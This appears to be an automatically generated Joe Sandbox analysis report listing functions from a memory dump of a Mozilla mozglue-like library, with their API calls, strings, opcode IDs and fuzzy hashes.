                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                      • String ID:
                                                                                                      • API String ID: 2787204188-0
                                                                                                      • Opcode ID: cbe8299bdb6cf2ed4b0f5e80f77d42d9ddc279a48c1d4e54e73d1fcaa4e32220
                                                                                                      • Instruction ID: 84ab761d214b969a4fdc705271a8a5b4a250733535fd63d4b350f30955700d15
                                                                                                      • Opcode Fuzzy Hash: cbe8299bdb6cf2ed4b0f5e80f77d42d9ddc279a48c1d4e54e73d1fcaa4e32220
                                                                                                      • Instruction Fuzzy Hash: D3F012715402097BE7019B94DC42EAB377DDB46624F090034FE1857741D735BD2986F7
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CFE85D3
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CFE8725
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                      • String ID: map/set<T> too long
                                                                                                      • API String ID: 3720097785-1285458680
                                                                                                      • Opcode ID: 5c9a38296ed53a2c1087fec315de5d7779407ef75fb9210b35d22f89f9488d19
                                                                                                      • Instruction ID: c760f47328bf771f4c8f9d3a36910687c1cf14d62fddba12fd461d740a8297a0
                                                                                                      • Opcode Fuzzy Hash: 5c9a38296ed53a2c1087fec315de5d7779407ef75fb9210b35d22f89f9488d19
                                                                                                      • Instruction Fuzzy Hash: 3D5164B4604641AFD701DF19C184B5ABBF1BF8A318F18C29AD8595BB62C335EC85CF92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF9BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CF9BDEB
                                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CF9BE8F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 2811501404-4108050209
                                                                                                      • Opcode ID: 30f30804094d0dfd6e4e3e59be9102ec29b760ef1eb3439bfec1a12395c4ed62
                                                                                                      • Instruction ID: 8b0ed4eebd3f087210428ac7db473dbe39c2454f8fadc081bf1438f0e757c27e
                                                                                                      • Opcode Fuzzy Hash: 30f30804094d0dfd6e4e3e59be9102ec29b760ef1eb3439bfec1a12395c4ed62
                                                                                                      • Instruction Fuzzy Hash: E541C372909745CFDB11DF78C481A9BB7F8AF8A348F004E1EF98597621D730D9498B82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFD3D19
                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6CFD3D6C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _errnomozalloc_abort
                                                                                                      • String ID: d
                                                                                                      • API String ID: 3471241338-2564639436
                                                                                                      • Opcode ID: 50f3580e3c08a1e938187fb6e3709815f64c642056922ef950ca3fb4bbcf119c
                                                                                                      • Instruction ID: 85fbbba388d3e53a301fc52add3b1e3f428656a6362f6c48724b31562a2a4874
                                                                                                      • Opcode Fuzzy Hash: 50f3580e3c08a1e938187fb6e3709815f64c642056922ef950ca3fb4bbcf119c
                                                                                                      • Instruction Fuzzy Hash: 46110435D0468C97DB008FA9CC156EEB775EF96318B4A821CED4597A02EB30B588C760
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CFF6E22
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFF6E3F
                                                                                                      Strings
                                                                                                      • MOZ_DISABLE_WALKTHESTACK, xrefs: 6CFF6E1D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Init_thread_footergetenv
                                                                                                      • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                      • API String ID: 1472356752-1153589363
                                                                                                      • Opcode ID: 87ec202f1a64a7eeadc9d3e64a467e4233e717f483927e36a59ef0e122dad074
                                                                                                      • Instruction ID: a100fcf80bd3b5482d7377fab10be6962c61d34921b10043633cfa0e23c9b49e
                                                                                                      • Opcode Fuzzy Hash: 87ec202f1a64a7eeadc9d3e64a467e4233e717f483927e36a59ef0e122dad074
                                                                                                      • Instruction Fuzzy Hash: 65F0B47B5092419BEA008BE8CC52BD67B75A753218F040169D43D86BA2DB21B517CA57
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA9EEF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Init_thread_footer
                                                                                                      • String ID: Infinity$NaN
                                                                                                      • API String ID: 1385522511-4285296124
                                                                                                      • Opcode ID: 16823f08ff55681578cf776e457fbe70550f2e6c1f035f0a464d5a5ff610650f
                                                                                                      • Instruction ID: 9eb309d3c828f0c384d9d81393bad485ccf94a1107bcad66c9000a0b4d1c0153
                                                                                                      • Opcode Fuzzy Hash: 16823f08ff55681578cf776e457fbe70550f2e6c1f035f0a464d5a5ff610650f
                                                                                                      • Instruction Fuzzy Hash: 35F0A4B6D08641CAEB00CFD8DC4A7B17F7BB357318F200629C52807641D7362546CA93
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFABED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • DisableThreadLibraryCalls.KERNEL32(?), ref: 6CFABEE3
                                                                                                      • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CFABEF5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$CallsDisableLoadThread
                                                                                                      • String ID: cryptbase.dll
                                                                                                      • API String ID: 4137859361-1262567842
                                                                                                      • Opcode ID: 991906019ef1c4affc06345b4709ddfbeb280dea708e1fd5fc1cfc304f992a79
                                                                                                      • Instruction ID: e7498ff82981f70ec498c1fe71e54e879b18e36072c0734395e0ec448839730b
                                                                                                      • Opcode Fuzzy Hash: 991906019ef1c4affc06345b4709ddfbeb280dea708e1fd5fc1cfc304f992a79
                                                                                                      • Instruction Fuzzy Hash: E2D0C73218410CFAD6406BD08D06B6577F8B706715F108421F75954551D7B19451CF95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFEB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CFEB2C9,?,?,?,6CFEB127,?,?,?,?,?,?,?,?,?,6CFEAE52), ref: 6CFEB628
                                                                                                        • Part of subcall function 6CFE90E0: free.MOZGLUE(?,00000000,?,?,6CFEDEDB), ref: 6CFE90FF
                                                                                                        • Part of subcall function 6CFE90E0: free.MOZGLUE(?,00000000,?,?,6CFEDEDB), ref: 6CFE9108
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CFEB2C9,?,?,?,6CFEB127,?,?,?,?,?,?,?,?,?,6CFEAE52), ref: 6CFEB67D
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CFEB2C9,?,?,?,6CFEB127,?,?,?,?,?,?,?,?,?,6CFEAE52), ref: 6CFEB708
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CFEB127,?,?,?,?,?,?,?,?), ref: 6CFEB74D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: freemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3061335427-0
                                                                                                      • Opcode ID: ffbd96c8afc90a3e987a914e56a721f3e07b7e021f7b56c1a58c3db52b3738cc
                                                                                                      • Instruction ID: 0f10c0ea5554b614b6b3a2294e1b13003de610b81642680c51b944e20c359fca
                                                                                                      • Opcode Fuzzy Hash: ffbd96c8afc90a3e987a914e56a721f3e07b7e021f7b56c1a58c3db52b3738cc
                                                                                                      • Instruction Fuzzy Hash: B551DCB1A053169FDB14CF59C98076EB7B1FF89304F45896DC85AABB00DB31E904CBA9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CFE6EAB
                                                                                                      • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CFE6EFA
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CFE6F1E
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFE6F5C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: malloc$freememcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 4259248891-0
                                                                                                      • Opcode ID: 8671b35cd67b3d484eb3ed8b78607d092df4d0ff51163d55f6c4ad6ca37a6545
                                                                                                      • Instruction ID: 7508e6db8114ebc7409366ea06786a0ff355cedcc7a68b9052f5415c52dafff0
                                                                                                      • Opcode Fuzzy Hash: 8671b35cd67b3d484eb3ed8b78607d092df4d0ff51163d55f6c4ad6ca37a6545
                                                                                                      • Instruction Fuzzy Hash: 3F31B271A1060E9FEB04CF2CC9816AA73E9AB89344F504639E51AC7651FB31E65987A0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFFB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CFA0A4D), ref: 6CFFB5EA
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CFA0A4D), ref: 6CFFB623
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CFA0A4D), ref: 6CFFB66C
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6CFA0A4D), ref: 6CFFB67F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: malloc$free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1480856625-0
                                                                                                      • Opcode ID: 7a656dc24a368c3b82abd69f69adb74156afc9ad0fc2d4eccb198f4540c1b40a
                                                                                                      • Instruction ID: d5b81ae656d91798f1d0df1b3a927b7effd3b67a383a69dc3ecf4c4804981bd3
                                                                                                      • Opcode Fuzzy Hash: 7a656dc24a368c3b82abd69f69adb74156afc9ad0fc2d4eccb198f4540c1b40a
                                                                                                      • Instruction Fuzzy Hash: AF31B4719012168FEB10CF58C84465EFBB6FF81314F1689A9C8269B721DB31E916CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFCF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CFCF611
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFCF623
                                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CFCF652
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFCF668
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3510742995-0
                                                                                                      • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                      • Instruction ID: f70f0180e868bf91922d4e5df2708a8e70a9bc8f83816e1503b7e6c2c9375c90
                                                                                                      • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                      • Instruction Fuzzy Hash: 75314F71B00215AFD754CF5DCCC0A9BB7B9EB88354B148939FA4A8BB04D631F9448B95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: d4fc5d5e04a3b507b789cc03692ea13e23ea0bfb9bed56dbfa6affa9dcc65dda
                                                                                                      • Instruction ID: 8ea9754768534431cec8cd9b81cff98894fe3d1ef3cec410c9dbbb1dd2c002ff
                                                                                                      • Opcode Fuzzy Hash: d4fc5d5e04a3b507b789cc03692ea13e23ea0bfb9bed56dbfa6affa9dcc65dda
                                                                                                      • Instruction Fuzzy Hash: D7F0F9B26012066BE7018F59DC84A4BB3B9EF45318B100135EA16D3B01F732F918C696
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%